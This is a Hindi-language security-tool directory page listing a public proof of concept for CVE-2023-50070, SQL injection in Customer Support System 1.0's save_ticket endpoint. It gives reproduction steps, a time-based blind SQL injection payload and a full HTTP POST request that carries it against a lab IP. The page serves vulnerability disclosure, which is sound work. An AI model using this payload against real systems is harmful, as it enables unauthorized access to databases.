Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50070 — `/customer_support/ajax.php?action=save_ticket` में मल्टीपल SQL इंजेक्शन कमजोरियाँ, Customer Support System 1.0 में प्रमाणित हमलावरों को `department_id`, `customer_id` और `subject` के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती हैं। | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-50070
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-50070

CVE-2023-50070

`/customer_support/ajax.php?action=save_ticket` में मल्टीपल SQL इंजेक्शन कमजोरियाँ, Customer Support System 1.0 में प्रमाणित हमलावरों को `department_id`, `customer_id` और `subject` के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती हैं।

रिपॉजिटरी देखें
212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50070

Customer Support System 1.0 - Multiple SQL injection vulnerabilities - save_ticket

विवरण: Customer Support System 1.0 में /customer_support/ajax.php?action=save_ticket में एक से अधिक SQL इंजेक्शन कमजोरियाँ हैं जो प्रमाणित हमलावरों को department_id, customer_id और subject के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती हैं।

कमजोर उत्पाद संस्करण: Customer Support System 1.0
CVE लेखक: Geraldo Alcântara
तारीख: 29/11/2023
CVE: CVE-2023-50070
CVE लिंक: https://www.cve.org/CVERecord?id=CVE-2023-50070
NVD लिंक: https://nvd.nist.gov/vuln/detail/CVE-2023-50070
पुष्टि तिथि: 15/12/2023
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

1- एप्लिकेशन में लॉग इन करें।
2- पृष्ठ /customer_support/index.php?page=new_ticket पर जाएं।
3- एक नया टिकट बनाएं और निम्नलिखित पैरामीटरों में से किसी एक में एक दुर्भावनापूर्ण पेलोड डालें: department_id, customer_id, या subject।
पेलोड: '+(select*from(select(sleep(20)))a)+'

root@kitploit:~
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835
Content-Length: 854
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"

'+(select*from(select(sleep(20)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"

teste
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"

<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

-----------------------------81419250823331111993422505835--

खोजकर्ता/क्रेडिट:
Geraldo Alcântara

टूल डाउनलोड करें